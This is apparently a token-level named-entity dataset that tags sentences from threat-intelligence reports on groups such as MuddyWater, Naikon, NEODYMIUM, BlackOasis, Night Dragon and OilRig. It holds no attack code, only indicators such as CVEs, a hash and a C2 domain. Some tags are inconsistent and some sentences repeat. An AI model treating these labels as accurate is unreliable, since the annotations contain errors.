+targets O
+in O
+Iraq S-LOC
+and O
+Saudi B-LOC
+Arabia E-LOC
+, O
+according O
+to O
+past O
+telemetry O
+. O
+
+The O
+new O
+spear-phishing S-ACT
+docs O
+used O
+by O
+MuddyWater S-APT
+rely O
+on O
+social B-IDTY
+engineering E-IDTY
+to O
+persuade O
+users O
+to O
+enable O
+macros O
+. O
+
+MuddyWater S-APT
+has O
+recently O
+been O
+targeting O
+victims O
+likely O
+from O
+Lebanon S-LOC
+and O
+Oman S-LOC
+, O
+while O
+leveraging O
+compromised O
+domains O
+, O
+one O
+of O
+which O
+is O
+owned O
+by O
+an O
+Israeli S-LOC
+web O
+developer O
+. O
+
+As O
+MuddyWater S-APT
+has O
+consistently O
+been O
+using O
+POWERSTATS S-MAL
+as O
+its O
+main O
+tool O
+, O
+they O
+are O
+relatively O
+easy O
+to O
+distinguish O
+from O
+other O
+actors S-APT
+. O
+
+In O
+March B-TIME
+2018 E-TIME
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+provided O
+a O
+detailed O
+analysis O
+of O
+another O
+campaign O
+that O
+bore O
+the O
+hallmarks O
+of O
+MuddyWater S-APT
+. O
+
+In O
+May B-TIME
+2018 E-TIME
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+found O
+a O
+new O
+sample O
+( O
+Detected O
+as O
+W2KM_DLOADR.UHAOEEN S-MAL
+) O
+that O
+may O
+be O
+related O
+to O
+this O
+campaign O
+. O
+
+In O
+May B-TIME
+2018 E-TIME
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+found O
+a O
+new O
+sample O
+( O
+Detected O
+as O
+W2KM_DLOADR.UHAOEEN S-MAL
+) O
+that O
+may O
+be O
+related O
+to O
+this O
+campaign O
+. O
+
+Given O
+the O
+use O
+of O
+lure O
+documents O
+designed O
+with O
+social B-IDTY
+engineering E-IDTY
+in O
+mind O
+, O
+it O
+is O
+likely O
+that O
+MuddyWater S-APT
+use O
+phishing S-ACT
+or O
+spam S-ACT
+to O
+target O
+users O
+who O
+are O
+unaware O
+of O
+these O
+documents O
+' O
+malicious O
+nature O
+. O
+
+We O
+recently O
+noticed O
+the O
+group O
+behind O
+MuddyWater S-APT
+that O
+appear O
+to O
+be O
+targeting O
+government B-IDTY
+bodies E-IDTY
+, O
+military B-IDTY
+entities E-IDTY
+, O
+telcos O
+and O
+educational B-IDTY
+institutions E-IDTY
+in O
+Jordan S-LOC
+, O
+Turkey S-LOC
+, O
+Azerbaijan S-LOC
+and O
+Pakistan S-LOC
+, O
+in O
+addition O
+to O
+the O
+continuous O
+targeting O
+of O
+Iraq S-LOC
+and O
+Saudi B-LOC
+Arabia E-LOC
+, O
+other O
+victims O
+were O
+also O
+detected O
+in O
+Mali S-LOC
+, O
+Austria S-LOC
+, O
+Russia S-LOC
+, O
+Iran S-LOC
+and O
+Bahrain. S-LOC
+. O
+
+Observed O
+Seedworm S-APT
+victims O
+were O
+located O
+primarily O
+in O
+Pakistan S-LOC
+and O
+Turkey S-LOC
+, O
+but O
+also O
+in O
+Russia S-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+, O
+Afghanistan S-LOC
+, O
+Jordan S-LOC
+, O
+and O
+elsewhere O
+. O
+
+The O
+MuddyWaters B-APT
+group E-APT
+has O
+carried O
+out O
+a O
+large O
+number O
+of O
+attacks O
+and O
+demonstrated O
+advanced O
+social B-ACT
+engineering E-ACT
+, O
+in O
+addition O
+to O
+the O
+active O
+development O
+of O
+attacks O
+, O
+infrastructure O
+and O
+the O
+use O
+of O
+new O
+methods O
+and O
+techniques O
+. O
+
+Cisco B-SECTEAM
+Talos E-SECTEAM
+assesses O
+with O
+moderate O
+confidence O
+that O
+a O
+campaign O
+we O
+recently O
+discovered O
+called O
+" O
+BlackWater O
+" O
+is O
+associated O
+with O
+suspected O
+persistent O
+threat B-APT
+actor I-APT
+MuddyWater E-APT
+. O
+
+In O
+this O
+latest O
+activity O
+, O
+BlackWater O
+first O
+added O
+an O
+obfuscated O
+Visual B-TOOL
+Basic I-TOOL
+for I-TOOL
+Applications E-TOOL
+( O
+VBA S-TOOL
+) O
+script O
+to O
+establish O
+persistence O
+as O
+a O
+registry O
+key O
+. O
+
+Talos S-SECTEAM
+has O
+uncovered O
+documents O
+that O
+we O
+assess O
+with O
+moderate O
+confidence O
+are O
+associated O
+with O
+suspected O
+persistent O
+threat B-APT
+actor I-APT
+MuddyWater E-APT
+. O
+
+MuddyWater S-APT
+has O
+been O
+active O
+since O
+at O
+least O
+November B-TIME
+2017 E-TIME
+and O
+has O
+been O
+known O
+to O
+primarily O
+target O
+entities O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+Between O
+February S-TIME
+and O
+March B-TIME
+2019 E-TIME
+, O
+probable O
+MuddyWater-associated B-MAL
+samples E-MAL
+indicated O
+that O
+BlackWater O
+established O
+persistence O
+on O
+the O
+compromised O
+host O
+, O
+at O
+used O
+PowerShell B-MAL
+commands E-MAL
+to O
+enumerate O
+the O
+victim O
+'s O
+machine O
+and O
+contained O
+the O
+IP S-PROT
+address O
+of O
+the O
+actor S-APT
+'s O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+. O
+
+Despite O
+last O
+month O
+'s O
+report O
+on O
+aspects O
+of O
+the O
+MuddyWater B-ACT
+campaign E-ACT
+, O
+the O
+group O
+is O
+undeterred O
+and O
+continues O
+to O
+perform O
+operations O
+. O
+
+Based O
+on O
+these O
+observations O
+, O
+as O
+well O
+as O
+MuddyWater S-APT
+'s O
+history O
+of O
+targeting O
+Turkey-based S-LOC
+entities O
+, O
+we O
+assess O
+with O
+moderate O
+confidence O
+that O
+this O
+campaign O
+is O
+associated O
+with O
+the O
+MuddyWater S-APT
+threat O
+actor O
+group O
+. O
+
+Our O
+recent O
+report O
+, O
+" O
+The O
+Chronicles O
+of O
+the O
+Hellsing B-APT
+APT E-APT
+: O
+the O
+Empire B-MAL
+Strikes I-MAL
+Back E-MAL
+" O
+began O
+with O
+an O
+introduction O
+to O
+the O
+Naikon B-APT
+APT E-APT
+, O
+describing O
+it O
+as O
+" O
+One O
+of O
+the O
+most O
+active O
+APTs O
+in O
+Asia S-LOC
+, O
+especially O
+around O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+" O
+. O
+
+It O
+came O
+in O
+the O
+form O
+of O
+a O
+" O
+Tran B-MAL
+Duy I-MAL
+Linh E-MAL
+" O
+CVE-2012-0158 S-VULID
+exploit S-VULNAME
+kit O
+document O
+MD5 S-ENCR
+: O
+de8a242af3794a8be921df0cfa51885f61 O
+and O
+was O
+observed O
+on O
+April B-TIME
+10 I-TIME
+, I-TIME
+2014 E-TIME
+. O
+
+Considering O
+the O
+volume O
+of O
+Naikon B-ACT
+activity E-ACT
+observed O
+and O
+its O
+relentless O
+, O
+repeated O
+attack O
+attempts O
+, O
+such O
+a O
+confrontation O
+was O
+worth O
+looking O
+into O
+, O
+so O
+we O
+did O
+. O
+
+The O
+attackers S-APT
+appeared O
+to O
+be O
+Chinese-speaking S-LOC
+and O
+targeted O
+mainly O
+top-level O
+government B-IDTY
+agencies E-IDTY
+and O
+civil B-IDTY
+and I-IDTY
+military I-IDTY
+organizations E-IDTY
+in O
+countries O
+such O
+as O
+the O
+Philippines S-LOC
+, O
+Malaysia S-LOC
+, O
+Cambodia S-LOC
+, O
+Indonesia S-LOC
+, O
+Vietnam S-LOC
+, O
+Myanmar S-LOC
+, O
+Singapore S-LOC
+, O
+Nepal S-LOC
+, O
+Thailand S-LOC
+, O
+Laos S-LOC
+and O
+China S-LOC
+. O
+
+The O
+oil B-IDTY
+and I-IDTY
+gas E-IDTY
+infrastructure O
+nexus O
+observed O
+in O
+connection O
+with O
+greensky27.vicp.net S-MAL
+and O
+other O
+Unit O
+78020 O
+( O
+Naikon S-APT
+) O
+infrastructure O
+suggests O
+targeting O
+patterns O
+supportive O
+of O
+the O
+PRC S-LOC
+'s O
+strategic O
+interests O
+over O
+energy B-IDTY
+resources E-IDTY
+within O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+and O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+This O
+Naikon S-APT
+report O
+will O
+be O
+complemented O
+by O
+a O
+follow-on O
+report O
+that O
+will O
+examine O
+the O
+Naikon S-APT
+TTP O
+and O
+the O
+incredible O
+volume O
+of O
+attack B-ACT
+activity E-ACT
+around O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+that O
+has O
+been O
+going O
+on O
+since O
+at O
+least O
+2010 S-TIME
+. O
+
+The O
+attackers S-APT
+appeared O
+to O
+be O
+Chinese-speaking S-LOC
+and O
+targeted O
+mainly O
+top-level O
+government B-IDTY
+agencies E-IDTY
+and O
+civil B-IDTY
+and I-IDTY
+military I-IDTY
+organizations E-IDTY
+in O
+countries O
+such O
+as O
+the O
+Philippines S-LOC
+, O
+Malaysia S-LOC
+, O
+Cambodia S-LOC
+, O
+Indonesia S-LOC
+, O
+Vietnam S-LOC
+, O
+Myanmar S-LOC
+, O
+Singapore S-LOC
+, O
+Nepal S-LOC
+. O
+
+This O
+bait B-FILE
+document E-FILE
+, O
+or O
+email B-ACT
+attachment E-ACT
+, O
+appears O
+to O
+be O
+a O
+standard O
+Word S-TOOL
+document O
+, O
+but O
+is O
+in O
+fact O
+an O
+CVE-2012-0158 S-VULID
+exploit S-VULNAME
+, O
+an O
+executable O
+with O
+a O
+double O
+extension O
+, O
+or O
+an O
+executable O
+with O
+an O
+RTLO O
+filename O
+, O
+so O
+it O
+can O
+execute O
+code O
+without O
+the O
+user O
+'s O
+knowledge O
+or O
+consent O
+. O
+
+In O
+the O
+Naikon S-APT
+scheme O
+, O
+a O
+C&C B-MAL
+server E-MAL
+can O
+be O
+specialized O
+XSControl O
+software O
+running O
+on O
+the O
+host O
+machine O
+. O
+
+It O
+was O
+during O
+operator O
+X O
+'s O
+network O
+monitoring O
+that O
+the O
+attackers S-APT
+placed O
+Naikon B-MAL
+proxies E-MAL
+within O
+the O
+countries O
+' O
+borders O
+, O
+to O
+cloak O
+and O
+support O
+real-time O
+outbound O
+connections O
+and O
+data O
+Exfiltration S-ACT
+from O
+high-profile O
+victim O
+organizations E-IDTY
+. O
+
+In O
+addition O
+to O
+stealing O
+keystrokes O
+, O
+Naikon S-APT
+also O
+intercepted O
+network B-ACT
+traffic E-ACT
+. O
+
+Operator O
+X O
+also O
+took O
+advantage O
+of O
+cultural O
+idiosyncrasies O
+in O
+its O
+target O
+countries O
+, O
+for O
+example O
+, O
+the O
+regular O
+and O
+widely O
+accepted O
+use O
+of O
+personal O
+Gmail O
+accounts O
+for O
+work O
+. O
+
+In O
+the O
+spring B-TIME
+of I-TIME
+2014 E-TIME
+, O
+we O
+noticed O
+an O
+increase O
+in O
+the O
+volume O
+of O
+attack B-ACT
+activity E-ACT
+by O
+the O
+Naikon B-APT
+APT E-APT
+. O
+
+In O
+particular O
+, O
+we O
+noticed O
+that O
+the O
+Naikon B-APT
+group E-APT
+was O
+spear-phished O
+by O
+an O
+actor S-APT
+we O
+now O
+call O
+" O
+Hellsing S-APT
+" O
+. O
+
+More O
+details O
+about O
+the O
+cloak O
+and O
+dagger O
+games O
+between O
+Naikon S-APT
+and O
+Hellsing S-APT
+can O
+be O
+found O
+in O
+our O
+blogpost O
+: O
+" O
+The O
+Chronicles O
+of O
+the O
+Hellsing B-APT
+APT E-APT
+: O
+The O
+Empire B-MAL
+Strikes I-MAL
+Back E-MAL
+" O
+. O
+
+Truvasys S-MAL
+has O
+been O
+involved O
+in O
+several O
+attack B-ACT
+campaigns E-ACT
+, O
+where O
+it O
+has O
+masqueraded O
+as O
+one O
+of O
+server O
+common O
+computer B-IDTY
+utilities E-IDTY
+, O
+including O
+WinUtils S-IDTY
+, O
+TrueCrypt S-IDTY
+, O
+WinRAR S-IDTY
+, O
+or O
+SanDisk S-IDTY
+. O
+
+PROMETHIUM S-APT
+is O
+an O
+activity O
+group O
+that O
+has O
+been O
+active O
+as O
+early O
+as O
+2012 S-TIME
+. O
+
+The O
+group O
+primarily O
+uses O
+Truvasys S-MAL
+, O
+a O
+first-stage O
+malware O
+that O
+has O
+been O
+in O
+circulation O
+for O
+several O
+years O
+. O
+
+NEODYMIUM S-APT
+is O
+an O
+activity O
+group O
+that O
+is O
+known O
+to O
+use O
+a O
+backdoor O
+malware O
+detected O
+by O
+Microsoft S-IDTY
+as O
+Wingbird S-MAL
+. O
+
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+both O
+used O
+an O
+exploit S-VULNAME
+for O
+CVE-2016-4117 S-VULID
+, O
+a O
+vulnerability O
+in O
+Adobe O
+Flash S-TOOL
+Player O
+that O
+, O
+at O
+the O
+time O
+, O
+was O
+both O
+unknown O
+and O
+unpatched O
+. O
+
+Data O
+about O
+Wingbird B-ACT
+activity E-ACT
+indicate O
+that O
+it O
+is O
+typically O
+used O
+to O
+attack O
+individual O
+computers O
+instead O
+of O
+networks O
+. O
+
+In O
+early B-TIME
+May I-TIME
+2016 E-TIME
+, O
+both O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+started O
+conducting O
+attack B-ACT
+campaigns E-ACT
+against O
+specific B-IDTY
+individuals E-IDTY
+in O
+Europe S-LOC
+. O
+
+Meanwhile O
+, O
+NEODYMIUM S-APT
+used O
+well-tailored O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+attachments O
+that O
+delivered O
+the O
+exploit S-VULNAME
+code O
+, O
+ultimately O
+leading O
+to O
+Wingbird S-MAL
+'s O
+installation O
+on O
+victim O
+computers O
+. O
+
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+both O
+used O
+a O
+zero-day S-VULNAME
+exploit S-VULNAME
+that O
+executed O
+code O
+to O
+download O
+a O
+malicious O
+payload O
+. O
+
+Wingbird S-MAL
+, O
+the O
+advanced O
+malware O
+used O
+by O
+NEODYMIUM S-APT
+, O
+has O
+several O
+behaviors O
+that O
+trigger O
+alerts O
+in O
+Windows B-SECTEAM
+Defender I-SECTEAM
+ATP E-SECTEAM
+. O
+
+This O
+volume O
+chronicles O
+two O
+activity B-APT
+groups E-APT
+, O
+code-named O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+, O
+both O
+of O
+which O
+target O
+individuals O
+in O
+a O
+specific O
+LOC O
+of O
+Europe S-LOC
+. O
+
+Although O
+most O
+malware O
+today O
+either O
+seeks O
+monetary O
+gain O
+or O
+conducts O
+espionage S-ACT
+for O
+economic S-IDTY
+advantage O
+, O
+both O
+of O
+these O
+activity B-APT
+groups E-APT
+appear O
+to O
+seek O
+information O
+about O
+specific B-IDTY
+individuals E-IDTY
+. O
+
+In O
+May B-TIME
+2016 E-TIME
+, O
+both O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+were O
+observed O
+to O
+launch O
+attack B-ACT
+campaigns E-ACT
+. O
+
+NEODYMIUM S-APT
+is O
+an O
+activity O
+group O
+that O
+, O
+like O
+PROMETHIUM S-APT
+, O
+conducted O
+an O
+attack B-ACT
+campaign E-ACT
+in O
+early B-TIME
+May I-TIME
+2016 E-TIME
+. O
+
+Data O
+about O
+Wingbird B-ACT
+activity E-ACT
+indicates O
+that O
+it O
+is O
+typically O
+used O
+to O
+attack O
+individuals O
+and O
+individual O
+computers O
+instead O
+of O
+networks O
+. O
+
+NEODYMIUM S-APT
+also O
+used O
+the O
+exact O
+same O
+CVE-2016-4117 S-VULID
+exploit S-VULNAME
+code O
+that O
+PROMETHIUM S-APT
+used O
+, O
+prior O
+to O
+public O
+knowledge O
+of O
+the O
+vulnerability O
+'s O
+existence O
+. O
+
+NEODYMIUM S-APT
+used O
+a O
+backdoor O
+detected O
+by O
+Windows S-OS
+Defender O
+as O
+Wingbird S-MAL
+, O
+whose O
+characteristics O
+closely O
+match O
+FinFisher S-IDTY
+, O
+a O
+government-grade O
+commercial O
+surveillance O
+package O
+. O
+
+In O
+May B-TIME
+2016 E-TIME
+, O
+two O
+apparently O
+unrelated O
+activity B-APT
+groups E-APT
+, O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+, O
+conducted O
+attack B-ACT
+campaigns E-ACT
+in O
+Europe S-LOC
+that O
+used O
+the O
+same O
+zeroday S-VULNAME
+exploit S-VULNAME
+while O
+the O
+vulnerability O
+was O
+publicly O
+unknown O
+. O
+
+The O
+Middle B-LOC
+Eastern E-LOC
+hacker O
+group O
+in O
+this O
+case O
+is O
+codenamed O
+" O
+BlackOasis S-APT
+" O
+Kaspersky S-SECTEAM
+found O
+the O
+group O
+was O
+exploiting O
+a O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2016-4117 S-VULID
+) O
+to O
+remotely O
+deliver O
+the O
+latest O
+version O
+of O
+" O
+FinSpy S-MAL
+" O
+malware O
+, O
+according O
+to O
+a O
+new O
+blog O
+post O
+published O
+Monday O
+. O
+
+FinSpy S-MAL
+, O
+a O
+final-stage O
+payload O
+that O
+allows O
+for O
+an O
+attacker S-APT
+to O
+covertly O
+learn O
+what O
+a O
+target O
+is O
+talking O
+about O
+and O
+who O
+they O
+are O
+communicating O
+with O
+, O
+is O
+associated O
+with O
+Gamma B-APT
+Group E-APT
+— O
+which O
+goes O
+by O
+other O
+names O
+, O
+including O
+FinFisher S-IDTY
+and O
+Lench O
+IT O
+Solutions O
+. O
+
+In O
+the O
+past O
+, O
+BlackOasis S-APT
+messages O
+were O
+designed O
+to O
+appear O
+like O
+news O
+articles O
+from O
+2016 S-TIME
+about O
+political S-IDTY
+relations O
+between O
+Angola S-LOC
+and O
+China S-LOC
+. O
+
+BlackOasis S-APT
+in O
+recent O
+months O
+sent O
+a O
+wave O
+of O
+phishing B-ACT
+emails S-TOOL
+. O
+
+PROMETHIUM S-APT
+uses O
+a O
+unique O
+set O
+of O
+tools O
+and O
+methods O
+to O
+perform O
+actions O
+like O
+lateral O
+movement O
+and O
+data O
+Exfiltration S-ACT
+. O
+
+Last O
+year O
+, O
+Microsoft S-IDTY
+researchers O
+described O
+Neodymium S-APT
+'s O
+behavior O
+as O
+unusual O
+: O
+" O
+unlike O
+many O
+activity B-APT
+groups E-APT
+, O
+which O
+typically O
+gather O
+information O
+for O
+monetary O
+gain O
+or O
+economic S-IDTY
+espionage O
+, O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+appear O
+to O
+launch O
+campaigns S-ACT
+simply O
+to O
+gather O
+information O
+about O
+certain O
+individuals O
+. O
+
+The O
+discovery O
+by O
+Kaspersky S-SECTEAM
+marks O
+at O
+least O
+the O
+fifth O
+zero-day S-VULNAME
+exploit S-VULNAME
+used O
+by O
+BlackOasis S-APT
+and O
+exposed O
+by O
+security O
+researchers O
+since O
+June B-TIME
+2015 E-TIME
+. O
+
+Victims O
+of O
+BlackOasis S-APT
+have O
+been O
+observed O
+in O
+the O
+following O
+countries O
+: O
+Russia S-LOC
+, O
+Iraq S-LOC
+, O
+Afghanistan S-LOC
+, O
+Nigeria S-LOC
+, O
+Libya S-LOC
+, O
+Jordan S-LOC
+, O
+Tunisia S-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+, O
+Iran S-LOC
+, O
+Netherlands S-LOC
+, O
+Bahrain S-LOC
+, O
+United B-LOC
+Kingdom E-LOC
+and O
+Angola S-LOC
+. O
+
+Unlike O
+many O
+activity B-APT
+groups E-APT
+, O
+which O
+typically O
+gather O
+information O
+for O
+monetary O
+gain O
+or O
+economic S-IDTY
+espionage O
+, O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+appear O
+to O
+launch O
+campaigns S-ACT
+simply O
+to O
+gather O
+information O
+about O
+certain O
+individuals O
+. O
+
+A O
+cursory O
+review O
+of O
+BlackOasis S-APT
+' O
+espionage B-ACT
+campaign E-ACT
+suggests O
+there O
+is O
+some O
+overlap O
+between O
+the O
+group O
+'s O
+actions O
+and O
+Saudi B-LOC
+Arabia E-LOC
+'s O
+geopolitical S-IDTY
+interests O
+. O
+
+Kaspersky S-SECTEAM
+'s O
+research O
+notes O
+that O
+BlackOasis S-APT
+hacked O
+into O
+computers O
+based O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+All O
+13 O
+countries O
+where O
+Kaspersky S-SECTEAM
+reportedly O
+observed O
+BlackOasis B-ACT
+activity E-ACT
+are O
+connected O
+to O
+Saudi B-LOC
+Arabia E-LOC
+in O
+one O
+of O
+three O
+ACTs O
+: O
+economically O
+; O
+from O
+a O
+national O
+security O
+perspective O
+; O
+or O
+due O
+to O
+established O
+policy O
+agreements O
+. O
+
+The O
+Operation B-ACT
+Aurora E-ACT
+, O
+named O
+by O
+McAfee S-SECTEAM
+and O
+announced O
+in O
+January B-TIME
+2010 E-TIME
+, O
+and O
+the O
+WikiLeaks S-SECTEAM
+document O
+disclosures O
+of O
+2010 S-TIME
+have O
+highlighted O
+the O
+fact O
+that O
+external O
+and O
+internal O
+threats O
+are O
+nearly O
+impossible O
+to O
+prevent O
+. O
+
+These O
+attacks O
+have O
+involved O
+social B-IDTY
+engineering E-IDTY
+, O
+spearphishing B-ACT
+attacks E-ACT
+, O
+exploitation O
+of O
+Microsoft S-IDTY
+Windows S-OS
+operating O
+systems O
+vulnerabilities O
+, O
+Microsoft S-IDTY
+Active O
+Directory O
+compromises O
+, O
+and O
+the O
+use O
+of O
+remote B-MAL
+administration I-MAL
+tools E-MAL
+( O
+RATs S-MAL
+) O
+in O
+targeting O
+and O
+harvesting O
+sensitive O
+competitive O
+proprietary O
+operations O
+and O
+project-financing O
+information O
+with O
+regard O
+to O
+oil B-IDTY
+and I-IDTY
+gas E-IDTY
+field O
+bids O
+and O
+operations O
+. O
+
+Night B-APT
+Dragon E-APT
+'s O
+attacks O
+have O
+involved O
+social B-IDTY
+engineering E-IDTY
+, O
+spearphishing B-ACT
+attacks E-ACT
+, O
+exploitation O
+of O
+Microsoft S-IDTY
+Windows S-OS
+operating O
+systems O
+vulnerabilities O
+, O
+Microsoft S-IDTY
+Active O
+Directory O
+compromises O
+, O
+and O
+the O
+use O
+of O
+remote B-MAL
+administration I-MAL
+tools E-MAL
+( O
+RATs S-MAL
+) O
+in O
+targeting O
+and O
+harvesting O
+sensitive O
+competitive O
+proprietary O
+operations O
+and O
+project-financing O
+information O
+with O
+regard O
+to O
+oil B-IDTY
+and I-IDTY
+gas E-IDTY
+field O
+bids O
+and O
+operations O
+. O
+
+We O
+have O
+identified O
+the O
+tools O
+, O
+techniques O
+, O
+and O
+network B-ACT
+activities E-ACT
+used O
+in O
+these O
+continuing O
+attacks—which O
+we O
+have O
+dubbed O
+Night B-APT
+Dragon—as E-APT
+originating O
+primarily O
+in O
+China S-LOC
+. O
+
+Attackers S-APT
+using O
+several O
+locations O
+in O
+China S-LOC
+have O
+leveraged O
+C&C S-TOOL
+servers O
+on O
+purchased O
+hosted O
+services O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+compromised O
+servers O
+in O
+the O
+Netherlands S-LOC
+to O
+wage O
+attacks O
+against O
+global O
+oil S-IDTY
+, O
+gas S-IDTY
+, O
+and O
+petrochemical B-IDTY
+companies E-IDTY
+, O
+as O
+well O
+as O
+individuals O
+and O
+executives S-IDTY
+in O
+Kazakhstan S-LOC
+, O
+Taiwan S-LOC
+, O
+Greece S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+to O
+acquire O
+proprietary O
+and O
+highly O
+confidential O
+information O
+. O
+
+Attackers S-APT
+using O
+several O
+locations O
+in O
+China S-LOC
+have O
+leveraged O
+C&C S-TOOL
+servers O
+on O
+purchased O
+hosted O
+services O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+compromised O
+servers O
+in O
+the O
+Netherlands S-LOC
+to O
+wage O
+attacks O
+against O
+global O
+oil S-IDTY
+, O
+gas S-IDTY
+, O
+and O
+petrochemical B-IDTY
+companies E-IDTY
+, O
+as O
+well O
+as O
+individuals O
+and O
+executives S-IDTY
+in O
+Kazakhstan S-LOC
+, O
+Taiwan S-LOC
+, O
+Greece S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+to O
+acquire O
+proprietary O
+and O
+highly O
+confidential O
+information O
+. O
+
+The O
+primary O
+operational O
+technique O
+used O
+by O
+Night B-APT
+Dragon E-APT
+comprised O
+a O
+variety O
+of O
+hacker O
+tools O
+, O
+including O
+privately O
+developed O
+and O
+customized O
+RAT B-MAL
+tools E-MAL
+that O
+provided O
+complete O
+remote O
+administration O
+capabilities O
+to O
+the O
+attacker S-APT
+. O
+
+While O
+Night B-ACT
+Dragon I-ACT
+attacks E-ACT
+focused O
+specifically O
+on O
+the O
+energy B-IDTY
+sector E-IDTY
+, O
+the O
+tools O
+and O
+techniques O
+of O
+this O
+kind O
+can O
+be O
+highly O
+successful O
+when O
+targeting O
+any O
+industry O
+. O
+
+In O
+addition O
+, O
+the O
+attackers S-APT
+employed O
+hacking O
+tools O
+of O
+Chinese S-LOC
+origin O
+and O
+that O
+are O
+prevalent O
+on O
+Chinese S-LOC
+underground O
+hacking O
+forums O
+. O
+
+We O
+have O
+been O
+presented O
+with O
+a O
+rare O
+opportunity O
+to O
+see O
+some O
+development B-ACT
+activities E-ACT
+from O
+the O
+actors S-APT
+associated O
+with O
+the O
+OilRig B-ACT
+attack I-ACT
+campaign E-ACT
+, O
+a O
+campaign O
+Unit B-SECTEAM
+42 E-SECTEAM
+has O
+been O
+following O
+since O
+May B-TIME
+2016 E-TIME
+. O
+
+Recently O
+we O
+were O
+able O
+to O
+observe O
+these O
+actors S-APT
+making O
+modifications O
+to O
+their O
+Clayslide B-MAL
+delivery I-MAL
+documents E-MAL
+in O
+an O
+attempt O
+to O
+evade O
+antivirus O
+detection O
+. O
+
+We O
+collected O
+two O
+sets O
+of O
+Clayslide B-MAL
+samples E-MAL
+that O
+appear O
+to O
+be O
+created O
+during O
+the O
+OilRig B-APT
+actor E-APT
+'s O
+development O
+phase O
+of O
+their O
+attack O
+lifecycle O
+. O
+
+On O
+November B-TIME
+15 I-TIME
+, I-TIME
+2016 E-TIME
+, O
+an O
+actor S-APT
+related O
+to O
+the O
+OilRig B-ACT
+campaign E-ACT
+began O
+testing O
+the O
+Clayslide B-MAL
+delivery I-MAL
+documents E-MAL
+. O
+
+The O
+actor S-APT
+then O
+made O
+subtle O
+modifications O
+to O
+the O
+file O
+and O
+uploaded O
+the O
+newly O
+created O
+file O
+to O
+the O
+same O
+popular O
+antivirus O
+testing O
+website O
+in O
+order O
+to O
+determine O
+how O
+to O
+evade O
+detection O
+. O
+
+In O
+addition O
+to O
+making O
+changes O
+to O
+the O
+Excel B-ACT
+worksheets E-ACT
+that O
+contain O
+the O
+decoy O
+content O
+, O
+the O
+actor S-APT
+also O
+made O
+changes O
+to O
+the O
+worksheet O
+that O
+is O
+initially O
+displayed O
+to O
+the O
+user O
+. O
+
+Taking O
+a O
+step O
+back O
+, O
+as O
+discussed O
+in O
+the O
+Appendix O
+in O
+our O
+initial O
+OilRig S-APT
+blog O
+, O
+Clayslide B-FILE
+delivery I-FILE
+documents E-FILE
+initially O
+open O
+with O
+a O
+worksheet O
+named O
+" O
+Incompatible O
+" O
+that O
+displays O
+content O
+that O
+instructs O
+the O
+user O
+to O
+" O
+Enable O
+Content O
+" O
+to O
+see O
+the O
+contents O
+of O
+the O
+document O
+, O
+which O
+in O
+fact O
+runs O
+the O
+malicious O
+macro O
+and O
+compromises O
+the O
+system O
+. O
+
+This O
+realization O
+suggests O
+that O
+the O
+OilRig S-APT
+threat O
+group O
+will O
+continue O
+to O
+use O
+their O
+delivery B-MAL
+documents E-MAL
+for O
+extended O
+periods O
+with O
+subtle O
+modifications O
+to O
+remain O
+effective O
+. O
+
+Iranian S-LOC
+threat O
+agent O
+OilRig S-APT
+has O
+been O
+targeting O
+multiple O
+organisations O
+in O
+Israel S-LOC
+and O
+other O
+countries O
+in O
+the O
+Middle B-LOC
+East E-LOC
+since O
+the O
+end B-TIME
+of I-TIME
+2015 E-TIME
+. O
+
+In O
+recent O
+attacks O
+they O
+set O
+up O
+a O
+fake O
+VPN B-MAL
+Web I-MAL
+Portal E-MAL
+and O
+targeted O
+at O
+least O
+five O
+Israeli S-LOC
+IT B-IDTY
+vendors E-IDTY
+, O
+several O
+financial B-IDTY
+institutes E-IDTY
+, O
+and O
+the O
+Israeli B-IDTY
+Post I-IDTY
+Office E-IDTY
+. O
+
+In O
+these O
+websites O
+they O
+hosted O
+malware O
+that O
+was O
+digitally O
+signed O
+with O
+a O
+valid O
+, O
+likely O
+stolen B-MAL
+code I-MAL
+signing I-MAL
+certificate E-MAL
+. O
+
+In O
+December B-TIME
+2015 E-TIME
+, O
+Symantec S-SECTEAM
+published O
+a O
+post O
+about O
+" O
+two O
+Iran-based S-LOC
+attack B-APT
+groups E-APT
+that O
+appear O
+to O
+be O
+connected O
+, O
+Cadelle S-APT
+and O
+Chafer S-APT
+" O
+that O
+" O
+have O
+been O
+using O
+Backdoor.Cadelspy S-MAL
+and O
+Backdoor.Remexi S-MAL
+to O
+spy O
+on O
+Iranian S-LOC
+individuals O
+and O
+Middle B-LOC
+Eastern E-LOC
+organizations O
+" O
+. O
+
+In O
+May B-TIME
+2016 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+observed O
+attacks O
+of O
+OilRig S-APT
+primarily O
+focused O
+on O
+financial B-IDTY
+institutions E-IDTY
+and O
+technology B-IDTY
+organizations E-IDTY
+within O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+In O
+recent O
+OilRig B-ACT
+attacks E-ACT
+, O
+the O
+threat O
+actors S-APT
+purport O
+to O
+be O
+legitimate B-IDTY
